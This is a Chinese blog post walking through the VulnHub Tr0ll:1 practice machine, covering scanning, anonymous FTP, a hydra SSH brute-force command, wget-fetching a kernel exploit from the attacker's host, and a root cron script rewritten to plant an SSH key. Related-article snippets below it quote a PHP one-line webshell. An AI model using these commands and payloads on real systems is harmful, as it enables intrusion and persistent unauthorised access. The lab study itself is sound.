2020年12月10日- Vulnhub-TR0LL: 1 渗透学习

最新推荐文章于 2024-01-14 23:56:44 发布
最新推荐文章于 2024-01-14 23:56:44 发布
阅读量174 收藏
点赞数
文章标签: 网络安全 kali linux 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AnonyMousIT/article/details/111026349
版权

2020年12月10日- Vulnhub-TR0LL: 1 渗透学习

一、介绍

二、情报收集

首先发现靶机的IP地址:

nmap -sP 192.168.31.0/24

image-20201210220103714

发现靶机IP

image-20201210220349064

发现开发着 21、 22、 80端口

其中ftp允许匿名登陆,存在secret目录和robots文件

登录ftp:

image-20201210220808802

可以发现登录成功

image-20201210221214479

发现一个lol.pcap文件 下载到本地,使用wireshark分析

image-20201210221933823

Well, well, well, aren’t you just a clever little devil, you almost found the sup3rs3cr3tdirlol 😛\n

Sucks, you were so close… gotta TRY HARDER!\n

英语渣渣直接使用百度翻译一下

image-20201210222409268

sup3rs3cr3tdirlol 还不知道是个什么东西。

打开网页

image-20201210222720268

然后查看扫描80端口发现的两个目录

image-20201210223111267

image-20201210223140828

没什么可利用的信息

尝试打开sup3rs3cr3tdirlol

image-20201210223244860

然后 下载roflmao,检查文件类型

image-20201210223452347

这是一个32位的可执行文件

使用 strings进行分析

image-20201210223656539

根据指示打开 页面试试

image-20201210223808092

查看目录下的文件

image-20201210223909348

image-20201210223925659

将 两个文件下载下来

使用 hydra 进行爆破

hydra -L which_one_lol.txt -p Pass.txt 192.168.31.80 ssh

image-20201210224413159

惊喜!!

使用ssh登录

image-20201210225029267

登录成功。靶机 系统版本Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

image-20201210224750276

三、提权

exploit-db.com 搜索该系统漏洞

image-20201210225341366

image-20201210225504504

image-20201210225719869

将 37292.c 复制出来

image-20201210230402996

开启服务,将37292.c 上传到 靶机

python -c ‘import pty; pty.spawn("/bin/bash")’

image-20201210231614500

wget http://192.168.31.77:5555/37292.c

image-20201210231600455

image-20201210231931503

获得管理员权限

image-20201210232232215

image-20201210232419591

另一种提权方法

image-20201210232737308

image-20201210232944108

image-20201210233043030

使用vim修改cleaner.py文件
命令:
#!/usr/bin/env python
import os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “加上 id_rsa.pub产生的密匙内容上图有例子” >> /root/.ssh/authorized_keys’)
except:
sys.exit()

os
import sys
try:
os.system(‘mkdir /root/.ssh; chmod 775 .ssh; echo “加上 id_rsa.pub产生的密匙内容上图有例子” >> /root/.ssh/authorized_keys’)
except:
sys.exit()

image-20201210233948518

未完待续。。。

在下菜鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Billu_b0x的渗透测试
Cper的博客
10-26 539
靶场的测试实践和不同思路
中国菜刀上传一句话木马,巴西烤肉提权
qiu_zhang_的博客
04-26 2103
如何使用中国菜刀上传一句话木马呢,今天我来教大家 首先在你的电脑上创建一个文本文件,内容写上一句话木马,可以是asp,也可以是PHP,注意更改value值。但是最后文件名后缀要改成.jpg。格式可以如图所示 在搭建好的网站中上传.jpg文件,会看到,上传以后的文件路径发生了改变,复制好这个文件路径。 打开中国菜刀,空白处右击,添加,将你的网址和你刚刚复制的文件路径粘贴上去。注意下图,在地址右侧小...
BUUCTF:Linux Labs
weixin_49186466的博客
08-05 4849
根据题目所示,在虚拟机中访问 ssh -p 29719 [email protected] -p 后接指定端口 root为用户名 @后接地址 注意:地址和端口为动态分配,根据自己题目给出 输yes,后输入题目给出密码,查看,得到flag flag{aacb1293-f6a6-49ef-982f-e298df60c515} ...
DVWA文件上传-菜刀工具
m0_64037702的博客
07-13 409
链接:https://pan.baidu.com/s/1jGuXh1XtLwssoEN1j3sGSA 提取码:shyh下载后解压上传文件搜集信息组成完整的后门路径菜刀中右键添加,输入收集到的后门路径,以及后门密钥点击添加。
中国菜刀使用教程--ctf 文件上传
weixin_40729735的博客
11-07 5498
首先把包含一句话的文件上传,php内容文件如下: <?php eval($_POST['a']); ?> 如果会过滤 <? 和 php 关键字,可以使用长标签 <script language="pHp">@eval($_POST['sb'])</script> 打开中国菜刀主页面,右键点击添加,配置如下(密码即上面的sb) 点击...
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
WNM2020-3/TR-VB-MOSFET产品应用与参数解析
10-28
N沟道,20V,6A,RDS(ON),24mΩ@4.5V,33mΩ@2.5V,8Vgs(±V);0.45~1Vth(V);SOT23
IPD技术评审(TR1-TR6)知识分享
03-15
IPD技术评审(TR1-TR6)知识分享IPD技术评审(TR1-TR6)知识分享IPD技术评审(TR1-TR6)知识分享IPD技术评审(TR1-TR6)知识分享IPD技术评审(TR1-TR6)知识分享
ISO_TR_7637-5:2016_Part 5:Enhanced definitions and verification
09-05
ISO/TR 7637-5:2016 提出了脉冲发生器的扩展定义和根据 ISO 7637‑2 协调用于脉冲测试的不同发生器所需的验证方法,以确保独立于发生器类型的测试结果的可比性和再现性。 它提供了基于 ISO 7637‑2 的当前定义的发电...
Cache-control使用Cache-control:private学习笔记
01-20
其作用根据不同的重新浏览方式,分为以下几种情况:(1)、打开新窗口值为private、no-cache、must-revalidate,那么打开新窗口访问时都会重新访问服务器。而如果指定了max-age值,那么在此值内的时间里就不会重新...
Linux Labs 1
最新发布
weixin_46601305的博客
01-14 558
BUUCTF 靶场 Linux Labs 1
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 5885
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
Billu_b0x 靶机 write up任意文件下载 审计出文件包含页面(特定参数)+头像上传图片马getshell 37292内核漏洞提权
YouthBelief的博客
11-30 1692
Billu_b0x 靶机 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘0x03 获取shell0x04 提权0x05 思路总结 0x00 环境搭建 下载链接 https://download.vulnhub.com/billu/Billu_b0x.zip nat模式 0x01 信息收集 IP探测 netdiscover -i eth0 -r 192.168.157.0/24 端口探测 masscan -p 1-65535 --rate 1000 192.168.157.
网络空间安全——攻防对抗 2.0
热门推荐
Jay
05-19 1万+
网络空间安全——攻防对抗 2 信息收集,使用kali,扫描己方靶机端口 21端口的ftp的攻击 ftp攻击方式,查看本机有哪些普通用户 admin/123456和guest/123456 然后提交flag 22端口的ssh攻击 使用session –I查看已经获取到的连接 使用session –I序号 获取连接 23 telnet的攻击方式 防御21-2...
owaspbwa靶机实践
weixin_45528771的博客
02-01 3706
upload 低安全级别 一、直接上传php木马文件 <?php @eval($_POST[joe]);?> 二、菜刀连接 上面代码中joe为连接密码 中安全级别 一、使用kali中的burp suite软件进行代理拦截 点入proxy栏中的options栏,将拦截地址改为kali的网络地址(在命令行中输入ip a即可得到) 再将上传文件的浏览器中的代理地址改为kali的网络地址,并...
网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
xueshenlaila的博客
02-24 4142
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 这篇文章教大家了解Metasploitable2靶机系统 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个网络安全全套
渗透测试
samtaoys的博客
10-16 6399
pantester 渗透测试是一种模拟恶意攻击者的技术与方法,挫败目标系统安全控制错失,去的访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式 黑盒测试 对渗透攻击目标网络内部拓扑一无所知,完全模拟真实黑客有组织有步骤的渗透入侵过程 花费时间长 渗透测试者需要有较高的技术能力 白盒测试 对渗透攻击目标网络非常了解,以最小的呆家进行系统安全探测
ubuntu14 查看/boot/initrd.img-3.13.0-32-generic内容
plusme
11-13 1270
1.为了保持干净操作你要这样 cd /tmp 2.copy操作 cp /boot/initrd.img-3.13.0-32-generic initrd.img 3.查看inttrd.img类型 file initrd.img 4.重新命名copy一个命名 cp initrd.img initrd.img.gz 5.解压 gzip -d initrd.mg.gz 会生成init...
在python中有一个时间数据库如下: {'date': '2023-05-9 21:00:00', 'Orbit': '371'} {'date': '2023-05-9 21:00:01', 'Orbit': '371'} {'date': '2023-05-9 21:00:02', 'Orbit': '371'} {'date': '2023-05-9 21:00:03', 'Orbit': '371'} {'date': '2023-05-9 21:00:04', 'Orbit': '371'} {'date': '2023-05-9 21:00:05', 'Orbit': '371'} {'date': '2023-05-9 21:00:06', 'Orbit': '371'} {'date': '2023-05-9 21:00:07', 'Orbit': '371'} {'date': '2023-05-9 21:00:08', 'Orbit': '371'} {'date': '2023-05-10 08:16:43', 'Orbit': '378'} {'date': '2023-05-10 08:16:44', 'Orbit': '378'} {'date': '2023-05-10 08:16:45', 'Orbit': '378'} {'date': '2023-05-10 08:16:46', 'Orbit': '378'} {'date': '2023-05-10 08:16:47', 'Orbit': '378'} {'date': '2023-05-10 08:16:48', 'Orbit': '378'} {'date': '2023-05-10 08:16:49', 'Orbit': '379'} {'date': '2023-05-10 08:16:50', 'Orbit': '379'} {'date': '2023-05-10 08:16:51', 'Orbit': '379'} {'date': '2023-05-10 08:16:52', 'Orbit': '379'} {'date': '2023-05-10 08:16:53', 'Orbit': '379'} {'date': '2023-05-10 08:16:54', 'Orbit': '379'} {'date': '2023-05-10 08:16:55', 'Orbit': '379'} {'date': '2023-05-10 08:16:56', 'Orbit': '379'} {'date': '2023-05-10 08:16:57', 'Orbit': '379'} {'date': '2023-05-10 08:16:58', 'Orbit': '379'} 我现在需要按照以下格式 20230509180413 20230509234724 GZ 78 20230510065339 20230510110050 JM 80 将数据库里面的时间放在相应的时间段里面,该怎么做
05-24
if time_int >= int(tr[0]) and time_int (tr[1]): orbit_sum[i] += int(item['Orbit']) count[i] += 1 # 计算每个时间段的Orbit平均值 orbit_avg = [0] * len(time_ranges) for i in range(len(time_ranges)): ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值